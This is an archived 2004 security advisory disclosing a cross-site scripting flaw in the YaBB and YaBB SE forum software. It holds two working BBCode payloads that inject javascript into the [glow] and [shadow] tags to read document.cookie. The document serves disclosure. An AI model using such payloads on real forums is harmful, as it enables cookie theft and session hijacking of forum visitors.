TUCoPS :: Web BBS :: Frequently Exploited :: hack3694.htm

YaBB/YaBBse Cross Site Scripting Vulnerability
YaBB/YaBBse Cross Site Scripting Vulnerability 





#####################################################################



 Advisory Name : YaBB/YaBBse Cross Site Scripting Vulnerability

  Release Date : Mar 14,2004 

   Application : YaBB/YaBBse

       Test On : YaBB 1 Gold(SP1.3)

                 YaBB SE 1.5.1 Final

    Vendor URL : http://www.yabbforum.com/ 

                 http://www.yabbse.org/ 

      Discover : Cheng Peng Su(apple_soup_at_msn.com)

     

#####################################################################



  Proof of conecpt:

      The problem is in [glow] and [shadow] tag,yabb doesn't filter

   the charactor in this tag,attack needn't visitor to click any 

   links,just when the vistor read the thread,XSS code will be 

   executed.

  

  Exploit:

   [glow=red);background:url(javascript:alert(document.cookie));filte

   r:glow(color=red,2,300]Big Exploit[/glow]

   [shadow=red);background:url(javascript:alert(document.cookie));fil

   ter:shadow(color=red,left,300]Big Exploit[/shadow]

   

  Contact:

   Cheng Peng Su

   Class 1,Senior 2,High school attached to Wuhan University

   Wuhan,Hubei,China(430072)

   apple_soup_at_msn.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH